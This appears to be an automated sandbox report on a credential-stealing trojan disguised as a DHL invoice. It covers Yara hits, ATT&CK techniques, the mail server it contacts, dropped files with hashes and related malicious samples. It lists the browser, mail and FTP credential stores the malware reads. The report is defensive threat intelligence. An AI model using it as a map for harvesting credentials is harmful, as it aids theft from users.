Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL_231437894819.bat.exe PID: 7972, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7048, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: uvbIwIYe.exe PID: 7856, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 2788, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL_231437894819.bat.exe PID: 7972, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7048, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: uvbIwIYe.exe PID: 7856, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 2788, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques are listed per tactic; a number in parentheses is the count shown against that technique for this analysis)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Windows Management Instrumentation (221), Scheduled Task/Job (1), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading (1), Scheduled Task/Job (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1), Process Injection (311), Scheduled Task/Job (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1), Masquerading (1), Virtualization/Sandbox Evasion (251), Process Injection (311)
Credential Access: OS Credential Dumping (2), Input Capture (1), Credentials in Registry (1), NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: File and Directory Discovery (1), System Information Discovery (24), Security Software Discovery (621), Process Discovery (1), Virtualization/Sandbox Evasion (251), Application Window Discovery (1), System Network Configuration Discovery (1), System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (11), Data from Local System (2), Email Collection (1), Input Capture (1), Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Ingress Tool Transfer (1), Encrypted Channel (11), Non-Standard Port (1), Non-Application Layer Protocol (2), Application Layer Protocol (23), Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Behavior Graph (ID: 1578149; Sample: DHL_231437894819.bat.exe; Start date: 19/12/2024; Architecture: WINDOWS; Score: 100)

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures.

Contacted hosts: mail.keeptraveling-eg.com (162.241.224.14, ports 49713, 49718, 587, UNIFIEDLAYER-AS-1US, United States); ip-api.com (208.95.112.1, ports 49712, 49716, 80, TUT-ASUS, United States); api.ipify.org (104.26.13.205, ports 443, 49711, 49714, CLOUDFLARENETUS, United States). All three are contacted by the second RegSvcs.exe instance started by DHL_231437894819.bat.exe.

DHL_231437894819.bat.exe (started):
• Dropped: C:\Users\user\AppData\Roaming\uvbIwIYe.exe (PE32); C:\Users\...\uvbIwIYe.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp1E51.tmp (XML); C:\Users\...\DHL_231437894819.bat.exe.log (ASCII)
• Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; 3 other signatures
• Started: RegSvcs.exe (2 instances), powershell.exe, 2 other processes (each with a conhost.exe child)
• First RegSvcs.exe instance: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
• powershell.exe: Loading BitLocker PowerShell Module; started conhost.exe and WmiPrvSE.exe

uvbIwIYe.exe (started):
• Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
• Started: RegSvcs.exe (2 instances), schtasks.exe (with a conhost.exe child)
• First RegSvcs.exe instance: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
DHL_231437894819.bat.exe | 65% | Virustotal |
DHL_231437894819.bat.exe | 71% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
DHL_231437894819.bat.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\uvbIwIYe.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\uvbIwIYe.exe | 71% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://mail.keeptraveling-eg.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.keeptraveling-eg.com | 162.241.224.14 | true | true | | unknown
api.ipify.org | 104.26.13.205 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
Name: https://api.ipify.org
Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp; RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp; uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp; uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://account.dyn.com/
Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp; uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp; uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://api.ipify.org/t
Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: http://crl.microsoft
Source: RegSvcs.exe, 0000000A.00000002.1539589797.0000000006036000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002E15000.00000004.00000800.00020000.00000000.sdmp; DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp; uvbIwIYe.exe, 0000000B.00000002.1555427783.00000000030F9000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: DHL_231437894819.bat.exe; uvbIwIYe.exe.0.dr
Malicious: false; Reputation: high

Name: http://mail.keeptraveling-eg.com
Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown

Name: http://ip-api.com
Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000010.00000002.3853312298.0000000002E21000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
162.241.224.14 | mail.keeptraveling-eg.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578149
Start date and time: 2024-12-19 10:27:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL_231437894819.bat.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/15@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 185
• Number of non-executed functions: 38
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 52.149.20.212
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
Time | Type | Description
04:28:27 | API Interceptor | 2x Sleep call for process: DHL_231437894819.bat.exe modified
04:28:33 | API Interceptor | 42x Sleep call for process: powershell.exe modified
04:28:36 | API Interceptor | 8810346x Sleep call for process: RegSvcs.exe modified
04:28:37 | API Interceptor | 2x Sleep call for process: uvbIwIYe.exe modified
10:28:35 | Task Scheduler | Run new task: uvbIwIYe path: C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              208.95.112.1dlhost.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                              • ip-api.com/json
                                              xt.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • ip-api.com/json
                                              roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • ip-api.com/json
                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                              • ip-api.com/json
                                              x.ps1Get hashmaliciousQuasarBrowse
                                              • ip-api.com/json/
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • ip-api.com/json/
                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • ip-api.com/json/
                                              Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                              • ip-api.com/json/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              mail.keeptraveling-eg.comDHL-SOA_88417.batGet hashmaliciousAgentTeslaBrowse
                                              • 162.241.224.14
                                              DHL-INVOICE- 1851940333.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 162.241.224.14
                                              DHL- INVOICE-1851940333.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 162.241.224.14
                                              DHL-AIR-WAYBILL.batGet hashmaliciousAgentTeslaBrowse
                                              • 162.241.224.14
                                              DHL-INVOICE-4977440333.bat.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.241.224.14
                                              DHL-INVOICE-00660840.batGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 162.241.224.14
                                              DHL INVOICE.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 162.241.224.14
Match: ip-api.com
Associated Sample Name / URL | Detection | Threat Name | Context
dlhost.exe | malicious | XWorm | 208.95.112.1
WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
xt.exe | malicious | XWorm | 208.95.112.1
roblox1.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
roblox.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 208.95.112.1
x.ps1 | malicious | Quasar | 208.95.112.1
https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost | malicious | Unknown | 208.95.112.2
Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1

Match: api.ipify.org
Associated Sample Name / URL | Detection | Threat Name | Context
iviewers.dll | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
script.ps1 | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
script.hta | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | 104.26.12.205
cali.exe | malicious | AgentTesla | 104.26.13.205
Awb 4586109146.bat.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
PO 0309494059506060609696007.exe | malicious | AgentTesla, GuLoader | 104.26.12.205
Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf | malicious | HTMLPhisher | 172.67.74.152
winws1.exe | malicious | Unknown | 104.26.12.205
KASHI SHIP PARTICULARS.pdf.scr.exe | malicious | AgentTesla | 172.67.74.152
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
Overheaped237.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
HUSDGHCE23ED.exe | malicious | MassLogger RAT | 172.67.177.134
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 172.67.179.109
CROC000400 .pdf | malicious | Unknown | 162.247.243.29
contract_signed.pdf | malicious | Unknown | 104.21.16.1
https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.eu | malicious | HTMLPhisher | 104.17.25.14
iviewers.dll | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
script.ps1 | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
MFQbv2Yuzv.exe | malicious | LummaC, Stealc | 104.21.64.80
SWIFT COPY.exe | malicious | FormBook | 104.21.86.111

Match: UNIFIEDLAYER-AS-1US
Associated Sample Name / URL | Detection | Threat Name | Context
vRecord__0064secs__warriorsheart.com.html | malicious | Unknown | 69.49.245.172
https://52kz793.afratradingagency.com/ | malicious | HTMLPhisher | 192.185.195.214
https://shorturl.at/roHta | malicious | HTMLPhisher | 192.185.113.94
DocuStream_Scan_l8obgs3v.pdf | malicious | HTMLPhisher | 192.185.158.101
PO 0309494059506060609696007.exe | malicious | AgentTesla, GuLoader | 192.185.13.234
x86_64.nn.elf | malicious | Mirai, Okiru | 166.63.22.4
https://ivsmn.kidsavancados.com/ | malicious | Unknown | 108.167.188.184
KASHI SHIP PARTICULARS.pdf.scr.exe | malicious | AgentTesla | 50.87.144.157
PO.bat.exe | malicious | AgentTesla, GuLoader | 192.185.13.234
https://www.sendspace.com/pro/dl/m2hhc1 | malicious | Unknown | 162.241.149.91

Match: TUT-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
dlhost.exe | malicious | XWorm | 208.95.112.1
WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
xt.exe | malicious | XWorm | 208.95.112.1
roblox1.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
roblox.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 208.95.112.1
x.ps1 | malicious | Quasar | 208.95.112.1
https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost | malicious | Unknown | 208.95.112.2
Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.26.13.205
Dix7g8PK1e.pdf | malicious | Unknown | 104.26.13.205
Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnk | malicious | RHADAMANTHYS | 104.26.13.205
main1.bat | malicious | Abobus Obfuscator | 104.26.13.205
66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.26.13.205
dlhost.exe | malicious | XWorm | 104.26.13.205
NOTIFICATION_OF_DEPENDANTS.vbs | malicious | Unknown | 104.26.13.205
Brooming.vbs | malicious | Remcos, GuLoader | 104.26.13.205
TT copy.js | malicious | FormBook | 104.26.13.205
file.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS | 104.26.13.205
                                              No context
                                              Process:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379460230152629
                                              Encrypted:false
                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                              MD5:4DC84D28CF28EAE82806A5390E5721C8
                                              SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                              SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                              SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                              Malicious:false
